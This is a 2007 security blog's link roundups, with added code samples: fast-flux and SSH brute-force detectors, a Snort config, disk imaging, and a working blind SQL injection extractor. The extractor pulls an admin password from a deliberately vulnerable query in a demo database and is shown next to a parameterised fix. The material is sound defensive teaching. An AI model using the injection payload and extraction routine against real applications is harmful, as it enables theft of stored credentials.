Year: 2007

Suggested Blog Reading – Monday July 16th, 2007

Ahhhh Monday……well after a long period of rest (read laziness) I’ve decided to get back on track. This means putting the CISSP exam in my sights, going back to the gym (yes my foot is finally feeling better), eating better, and generally getting more involved in security.

Here’s the list:

The Soft Underbelly? – Database Security – Why won’t people learn? I guess this is the kind of thing that keeps us in business.

It’s not surprising that SQL injection and database hacking are getting more frequent: as people ramp up perimeter security, more often than not they forget about interior security, software application security and, most of all, database security.

The irony is, generally THE most important information is stored in corporate databases, including credit card details, social security information, corporate figures and all the guts that power the white-collar machine.

Oh Look. An Apple WORM. – It was only a matter of time really.

With a few hours work I have put together a proof of concept worm that works on Mac OS X (Intel). I need to get a hold of an older PPC Mac to test that platform but I suspect it will work just fine.

Before I say any more, because I know some of you will ask, NO I will not send you the PoC or any related details. I wrote this for my own purposes and it will be demonstrated to those who asked me to engage in this work. Yes, I am being compensated for this (Hi Joanna) and yes, Apple will be shown my work. Eventually.

Internet Search Returns Westminster Student Information – I know I probably shouldn’t be surprised…but I am. Why can’t people understand the importance of protecting sensitive information from the public?

Barb, a Westminster College alumna, received an unpleasant surprise while searching the Internet for her name. Among the results were two files hosted on the Westminster student web server containing the names and Social Security numbers of 100 current and former Westminster students. According to Laura Murphy, Westminster executive director of communications, the files were removed immediately after Barb notified the college and an investigation is ongoing. According to Murphy, the files were placed on the web server through an innocent accident and these files were not easily accessible to non-students. However, Westminster is taking this incident seriously and has launched an investigation to help determine what steps need to be in place to prevent such accidents in the future. Westminster has contacted all 100 students and has agreed to pay for one year of credit monitoring for those affected by this incident.

Know Your Enemy: Fast-Flux Service Networks – Interesting article from The Honeynet Project. Check it out.

One of the most active threats we face today on the Internet is cyber-crime. Increasingly capable criminals are constantly developing more sophisticated means of profiting from online criminal activity. This paper demonstrates a growing, sophisticated technique called fast-flux service networks which we are seeing increasingly used in the wild. Fast-flux service networks are a network of compromised computer systems with public DNS records that are constantly changing, in some cases every few minutes. These constantly changing architectures make it much more difficult to track down criminal activities and shut down their operations.

In this paper we will first provide an overview of what fast-flux service networks are, how they operate, and how the criminal community is leveraging them, including two types which we have designated as single-flux and double-flux service networks. We then provide several examples of fast-flux service networks recently observed in the wild. Next we detail how fast-flux service network malware operates and present the results of research where a honeypot was purposely infected with a fast-flux agent. Finally we cover how to detect, identify, and mitigate fast-flux service networks, primarily in large networking environments. At the end we supply five appendixes providing additional information for those interested in digging into more technical detail.
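The two patterns the paper names are easy to tell apart once you keep the history of a name’s answers instead of a single lookup. Below is an added example of that check (my code, not the Honeynet Project’s and not from the paper): it summarises successive DNS answers and reports “single-flux” when only the host’s A records churn and “double-flux” when the zone’s NS records churn as well. The lookup histories are constructed, the thresholds are my assumptions, and the /16 prefix test is a crude offline stand-in for the ASN diversity a real detector would check. The “cdn” sample is there to show the main false-positive source: a content delivery network also uses low TTLs and rotating answers, but its addresses stay inside its own blocks.

```python
from ipaddress import ip_network

# Thresholds are assumptions for this constructed sample, not values from the
# Honeynet paper; tune them against your own resolver logs.
MAX_TTL = 300          # flux nodes are rotated with very short TTLs
MIN_DISTINCT_A = 6     # distinct A records seen across successive lookups
MIN_PREFIXES = 4       # distinct /16 blocks; a stand-in for "spread over many ISPs"
MIN_DISTINCT_NS = 4    # distinct name servers for the zone (double-flux)


def prefix16(ip):
    """/16 of an IPv4 address, used here instead of a real ASN lookup."""
    return str(ip_network(ip + "/16", strict=False))


def summarize(responses):
    """responses: successive answers for one name, each (ttl, [rdata, ...]).
    Returns the highest TTL seen, the set of distinct rdata, and how many
    times the answer set changed between consecutive lookups."""
    seen, changes, prev = set(), 0, None
    for _, rdata in responses:
        cur = frozenset(rdata)
        if prev is not None and cur != prev:
            changes += 1
        seen |= cur
        prev = cur
    return {"max_ttl": max(ttl for ttl, _ in responses),
            "distinct": seen, "changes": changes}


def a_records_flux(responses):
    s = summarize(responses)
    prefixes = {prefix16(ip) for ip in s["distinct"]}
    return (s["max_ttl"] <= MAX_TTL and s["changes"] > 0
            and len(s["distinct"]) >= MIN_DISTINCT_A
            and len(prefixes) >= MIN_PREFIXES)


def ns_records_flux(responses):
    s = summarize(responses)
    return (s["max_ttl"] <= MAX_TTL and s["changes"] > 0
            and len(s["distinct"]) >= MIN_DISTINCT_NS)


def classify(a_responses, ns_responses):
    """'double-flux' if both the host's A records and the zone's NS records
    churn, 'single-flux' if only the A records do, otherwise 'none'."""
    if not a_records_flux(a_responses):
        return "none"
    return "double-flux" if ns_records_flux(ns_responses) else "single-flux"


# Constructed lookup histories using documentation/private ranges; not sightings.
STABLE_NS = [(86400, ["ns1.example", "ns2.example"])] * 3
FLUX_A = [
    (300, ["192.0.2.10", "198.51.100.22", "203.0.113.5"]),
    (300, ["10.1.2.3", "10.2.3.4", "10.3.4.5"]),
    (300, ["10.4.5.6", "10.5.6.7", "192.0.2.10"]),
]
SAMPLES = {
    # ordinary host: one address, day-long TTL
    "static": ([(86400, ["192.0.2.1"])] * 3, STABLE_NS),
    # CDN-style round robin: low TTL, rotating answers, but all from one block
    "cdn": ([(60, ["198.51.100.1", "198.51.100.2"]),
             (60, ["198.51.100.3", "198.51.100.4"]),
             (60, ["198.51.100.5", "198.51.100.6"])], STABLE_NS),
    # A records churn across many blocks, name servers stay put
    "single": (FLUX_A, STABLE_NS),
    # A records churn and the zone's NS set churns with them
    "double": (FLUX_A, [(300, ["ns1.flux.example", "ns2.flux.example"]),
                        (300, ["ns3.flux.example", "ns4.flux.example"]),
                        (300, ["ns5.flux.example", "ns6.flux.example"])]),
}


def classify_all(samples=SAMPLES):
    return {name: classify(a, ns) for name, (a, ns) in samples.items()}


if __name__ == "__main__":
    for name, verdict in classify_all().items():
        print(f"{name:8s} {verdict}")
```

Run it as a script to see each sample’s verdict. In practice the input is a series of answers pulled from a resolver query log or a passive DNS feed, and the /16 check should be replaced by a real ASN lookup, since the point the paper makes is that flux agents sit on compromised hosts scattered across many networks.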

For your weekend viewing pleasure – Some botnet videos on YouTube.

Suggested Blog Reading – Friday July 13th, 2007

It’s Friday the 13th…cue ominous music…but I’m counting on everything going smoothly today. Is it just me or do things always tend to explode on Fridays?

Here’s the list:

Oracle UK systems accused in ‘SSH hacking spree’ – “Bad Oracle….bad!”

Compromised computers at Oracle UK are listed among the 10 worst offenders on the net for launching attacks on servers which run SSH (secure shell) server software.

Oracle said it is investigating the reported problem, which it is yet to either confirm or refute.

A box (or group of boxes behind a proxy) at Oracle UK is among the worst offenders for launching attacks, according to statistics from servers running DenyHosts software to block SSH brute-force password attacks.
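What the reporting DenyHosts installations are doing, as an added example that is my code and not DenyHosts itself: read sshd’s “Failed password” syslog lines, count failures per source address, and turn the offenders into the TCP-wrappers entries that end up in /etc/hosts.deny. The log lines are constructed and the thresholds are assumptions. The third source in the sample fails once an hour: a sliding window never flags it, while the cumulative count (DenyHosts’ approach) does, which is the trade-off to keep in mind, since cumulative counting also eventually locks out a forgetful legitimate user.

```python
import re
from collections import defaultdict
from datetime import datetime

# OpenSSH's syslog line. The year is absent, so timestamps are only
# comparable within one log, which is all a window check needs.
FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

# Constructed sample log, not real traffic.
SAMPLE_LOG = """\
Jul 13 09:58:01 web1 sshd[2101]: Failed password for invalid user admin from 192.0.2.10 port 40122 ssh2
Jul 13 09:58:03 web1 sshd[2103]: Failed password for invalid user oracle from 192.0.2.10 port 40130 ssh2
Jul 13 09:58:05 web1 sshd[2105]: Failed password for root from 192.0.2.10 port 40141 ssh2
Jul 13 09:58:07 web1 sshd[2107]: Failed password for invalid user test from 192.0.2.10 port 40150 ssh2
Jul 13 09:58:09 web1 sshd[2109]: Failed password for invalid user guest from 192.0.2.10 port 40161 ssh2
Jul 13 10:02:44 web1 sshd[2150]: Failed password for alice from 198.51.100.7 port 51002 ssh2
Jul 13 10:02:51 web1 sshd[2150]: Accepted password for alice from 198.51.100.7 port 51002 ssh2
Jul 13 11:30:00 web1 sshd[2300]: Failed password for root from 203.0.113.9 port 3322 ssh2
Jul 13 12:30:00 web1 sshd[2310]: Failed password for root from 203.0.113.9 port 3390 ssh2
Jul 13 13:30:00 web1 sshd[2320]: Failed password for root from 203.0.113.9 port 3401 ssh2
Jul 13 14:30:00 web1 sshd[2330]: Failed password for root from 203.0.113.9 port 3455 ssh2
Jul 13 15:30:00 web1 sshd[2340]: Failed password for root from 203.0.113.9 port 3470 ssh2
"""


def parse_ts(ts):
    """Syslog 'Mon dd HH:MM:SS' (day may be space-padded) to a datetime."""
    mon, day, clock = ts.split()
    return datetime.strptime(f"{mon} {int(day):02d} {clock}", "%b %d %H:%M:%S")


def brute_force_sources(log_text, threshold=5, window=600):
    """Sources with `threshold` failed logins inside `window` seconds.
    window=None counts failures cumulatively over the whole log, which is
    what catches a low-and-slow attacker but also a careless regular user."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            failures[m["ip"]].append(parse_ts(m["ts"]))
    flagged = []
    for ip, times in failures.items():
        times.sort()
        if window is None:
            if len(times) >= threshold:
                flagged.append(ip)
            continue
        # any run of `threshold` consecutive failures that fits in the window
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window:
                flagged.append(ip)
                break
    return sorted(flagged)


def hosts_deny_lines(ips):
    """TCP-wrappers entries of the kind DenyHosts appends to /etc/hosts.deny."""
    return [f"sshd: {ip}" for ip in ips]


if __name__ == "__main__":
    print("windowed  :", brute_force_sources(SAMPLE_LOG))
    print("cumulative:", brute_force_sources(SAMPLE_LOG, window=None))
    print("\n".join(hosts_deny_lines(brute_force_sources(SAMPLE_LOG))))
```

Whichever counting rule you pick, put the block list behind an allow list of your own management addresses first: an attacker who can make failed logins appear to come from your jump host can otherwise lock you out of your own servers.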

Patching an IPS – 16 months ! – Woah…..

Looking into the disclosure timeline [pdf] from Andres Riancho of Cybsec Security Systems, the vendor was contacted on 6th February 2006 already.

The updated TOS version was released on 4th July, 2007, i.e. last week.

I’m not saying 3Com is slow when fixing vulnerabilities, I think this issue was extremely difficult to resolve. Cybsec will “disclose technical details 30 days after publication of pre-advisory”. Let’s wait!

FG-Injector – SQL Injection & Proxy Tool – New tool to test out.

FG-Injector Framework is a set of tools designed to help find SQL injection vulnerabilities in web applications, and help the analyst assess their severity. It includes a powerful proxy feature for intercepting and modifying HTTP requests, and an inference engine for automating SQL injection exploitation.
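An added example that covers both the database-security item above and the inference engine FG-Injector advertises (my code, not FG-Injector’s): a lookup that concatenates user input into its SQL, the same lookup with a bound parameter, and a blind boolean inference routine that reads the admin’s password out of the vulnerable version one character at a time without ever seeing query output, only whether any rows came back. The in-memory SQLite schema and rows are constructed; the real tools do the same over HTTP, with “the page rendered a result” as the oracle.

```python
import sqlite3


def make_db():
    """Constructed sample database (not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "s3cret", "user"),
        ("admin", "Tr0ub4dor", "admin"),
    ])
    return conn


def lookup_vulnerable(conn, name):
    """The bug: user input is spliced into the statement text."""
    sql = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    """The fix: a bound parameter can only ever be a value, never SQL."""
    sql = "SELECT name, role FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def oracle(conn, lookup, condition):
    """Boolean oracle behind a blind injection: does the lookup return rows
    when `condition` is ORed into its WHERE clause? A SQL error counts as no."""
    payload = "x' OR (" + condition + ") --"
    try:
        return len(lookup(conn, payload)) > 0
    except sqlite3.Error:
        return False


def extract(conn, lookup, scalar_sql, max_len=64):
    """Recover the result of `scalar_sql` (a query returning one string)
    character by character, binary-searching each code point so it costs
    about seven oracle queries per character instead of one per candidate."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, lookup, f"length(({scalar_sql})) >= {pos}"):
            break  # past the end of the value
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, lookup,
                      f"unicode(substr(({scalar_sql}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


ADMIN_PASSWORD_SQL = "SELECT password FROM users WHERE name = 'admin'"

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable   :", repr(extract(conn, lookup_vulnerable, ADMIN_PASSWORD_SQL)))
    print("parameterised:", repr(extract(conn, lookup_safe, ADMIN_PASSWORD_SQL)))
```

Against the parameterised lookup every payload is just a user name that does not exist, so the oracle is always false and nothing comes out. That is the whole argument for bound parameters over input filtering: the inference engine never needs a single character of output, only a yes/no difference, and a filter has to block every way of producing that difference.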

NIST releases revised FIPS crypto standard for review – Review away my friends….review away!

The latest version of the Federal Information Processing Standard for cryptographic modules, FIPS 140-3, has been released for comment by the National Institute of Standards and Technology.

Comments on the draft, available online at http://csrc.nist.gov/publications/drafts.html#fips140-3, are due to NIST by Oct. 11.

The current standard, FIPS 140-2, grew out of Federal Standard 1027, General Security Requirements for Equipment, which used the now-outdated Data Encryption Standard. FIPS 140-1 was issued in 1994 with a requirement that it be reviewed every five years. The review and revision process can take several years, and FIPS 140-2 was approved in 2001.

Suggested Blog Reading – Thursday July 12th, 2007

It’s Thursday…one day between me and my precious weekend.

Here’s the list:

Webinar: Cross-Site Request Forgery – Free webinar if you’re interested.

For those interested in learning about Cross-Site Request Forgery (CSRF), WhiteHat is hosting a webinar on July 24, 2007 at 11:00 AM PDT. This is about the basics, ins and outs, and solutions in straightforward terms. If you want to attend, registration is free.

Secret Military Materials Posted to Unprotected Public Servers – This has “good idea” written all over it.

In the latest government scandal that may make you drop your head in your hands and groan, the Feds have accidentally posted critical information to unsecured public FTP servers — critical as in blueprints, aerial photographs, and geographical surveys that could show Iraqi insurgents entry points and weaknesses at key military sites. The Associated Press published their report this afternoon.
The military may know something about secrecy in the trenches, but next to nothing about security on the Internet. They initially refused to release the information, and then unwittingly posted it online, according to AP:

The military calls it “need-to-know” information that would pose a direct threat to U.S. troops if it were to fall into the hands of terrorists. It’s material so sensitive that officials refused to release the documents when asked.

But it’s already out there, posted carelessly to file servers by government agencies and contractors, accessible to anyone with an Internet connection.

Snort Report 7 Posted – Richard has posted his 7th Snort report. These are always a good read for anyone who uses Snort.

In the last Snort Report we looked at output methods for Snort. These included several ways to write data directly to disk, along with techniques for sending alerts via Syslog and even performing direct database inserts. I recommended not configuring Snort to log directly to a database because Snort is prone to drop packets while performing database inserts. In this edition of the Snort Report I demonstrate how to use unified output, the preferred method for high performance Snort operation.
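The two choices side by side as a snort.conf fragment, added here and not taken from the Snort Report. The directive syntax is Snort 2.x’s; the file names, the 128 MB rotation limit and the database credentials are placeholders.

```conf
# Discouraged for a production sensor: Snort blocks on each insert while the
# database round-trips, and packets are dropped in the meantime.
output database: log, mysql, user=snort password=changeme dbname=snort host=localhost

# Preferred: write binary unified records to the spool directory and let a
# separate reader (Barnyard) do the database work off the capture path.
# "limit 128" rotates the file at 128 MB.
output alert_unified: filename snort.alert, limit 128
output log_unified: filename snort.log, limit 128
```

Keep only one of the two in the running config: leaving the database line in alongside unified output brings the packet loss right back.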

Fun Intrusion Story – “Major network penetrations of any kind are exceedingly uncommon.” …. HAHAHAHAHAHAH.

Here is an enlightening account of a major intrusion investigation of a cell phone network in Greece.

Tina Bird’s Logs and Law Summary – Good reference material.

Here is the most comprehensive summary of all legal, regulatory, policy and other guidance documents that mention logging, created and maintained by none other than Tina Bird, who seems to be back in logland full time 🙂

Do-It-Yourself Forensics – Exceptionally good article from a legal publication.

All over America, vendors stand ready to solve the e-discovery problems of big, rich companies. But here’s the rub: Most American businesses are small companies that use computers — and along with individual litigants, they’re bound by the same preservation obligations as the Fortune 500, including occasionally needing to preserve forensically significant information on computer hard drives. But what if there’s simply no money to hire an expert, or your client insists that its own IT people must do the job?
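The one step the article’s in-house IT person must get right is the acquisition: copy every sector once, never stop on a read error, and record a hash of what was actually acquired so the copy can be proven faithful later. What follows is an added example of that procedure (my code, not from the article; SampleDevice is a constructed in-memory stand-in for a raw disk, including one failing sector, and the sector size and chunking are assumptions).

```python
import hashlib
import io

SECTOR = 512  # assumed sector size for the sample "disk"


class SampleDevice(io.BytesIO):
    """Constructed stand-in for a raw disk: an in-memory buffer that raises
    an I/O error on the sector indexes listed in `bad`, like a failing drive."""

    def __init__(self, data, bad=()):
        super().__init__(data)
        self.bad = set(bad)

    def read(self, n=-1):
        if self.tell() // SECTOR in self.bad:
            raise OSError("Input/output error")
        return super().read(n)


def acquire(src, dst):
    """Sector-by-sector copy of src into dst that never aborts on a read
    error: an unreadable sector is zero-filled and its byte offset recorded
    (the same behaviour as dd's conv=noerror,sync). Returns the acquisition
    metadata, including the SHA-256 of the data as acquired."""
    digest = hashlib.sha256()
    bad_sectors = []
    offset = 0
    while True:
        src.seek(offset)  # re-seek each time so a failed read cannot skew position
        try:
            chunk = src.read(SECTOR)
        except OSError:
            bad_sectors.append(offset)
            chunk = b"\x00" * SECTOR
        if not chunk:
            break
        dst.write(chunk)
        digest.update(chunk)
        offset += len(chunk)
    return {"bytes": offset, "bad_sectors": bad_sectors, "sha256": digest.hexdigest()}


def verify(image, expected_sha256):
    """Independently re-hash the finished image and compare with the
    acquisition hash; this is what gets repeated before the image is used."""
    image.seek(0)
    digest = hashlib.sha256()
    for chunk in iter(lambda: image.read(1 << 20), b""):
        digest.update(chunk)
    return digest.hexdigest() == expected_sha256


def demo():
    """Image a clean sample disk and one with a failing sector; report whether
    each image verifies and whether its hash matches the original bytes."""
    data = bytes(range(256)) * 16  # 4096 constructed bytes = 8 sectors
    results = {}
    for name, bad in (("clean", ()), ("failing", (3,))):
        image = io.BytesIO()
        meta = acquire(SampleDevice(data, bad), image)
        meta["verified"] = verify(image, meta["sha256"])
        meta["matches_original"] = meta["sha256"] == hashlib.sha256(data).hexdigest()
        results[name] = meta
    return results


if __name__ == "__main__":
    for name, meta in demo().items():
        print(name, meta)
```

On a real machine the source is the raw device opened read-only (behind a hardware write blocker if one is available), the destination is a file on separate media, and the returned metadata goes into the acquisition log next to the image. The “failing” result shows why that log must list the zero-filled sectors: the image hash then legitimately differs from anything computed over the drive itself, and without the record of bad sectors the mismatch looks like tampering.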

Misplaced Class Roster Contained Student Social Security Numbers – Wow….just…..wow.

For the second time in as many months, Texas A&M, Corpus Christi is alerting students over the loss of personal information. This latest incident involved the temporary loss of a class roster containing the names and Social Security numbers of the 49 individuals enrolled in A&M-CC’s Business Law 3310 class. The adjunct professor for the class, Terrell Dahlman, immediately notified School of Business officials and class students when he discovered the roster missing. In an e-mail to students, Dahlman asked each student to check their handouts to see if they accidentally picked up the roster. A student, it turns out, did accidentally pick up the roster and returned the roster to Dahlman during the next class. According to Marshall Collins, vice president for marketing and communications, A&M-CC will not investigate this incident further since the roster was returned. When asked about A&M-CC using Social Security numbers for identification, Collins replied, “All we have to go by is Social Security numbers. It’s one of the fallacies of the system.”
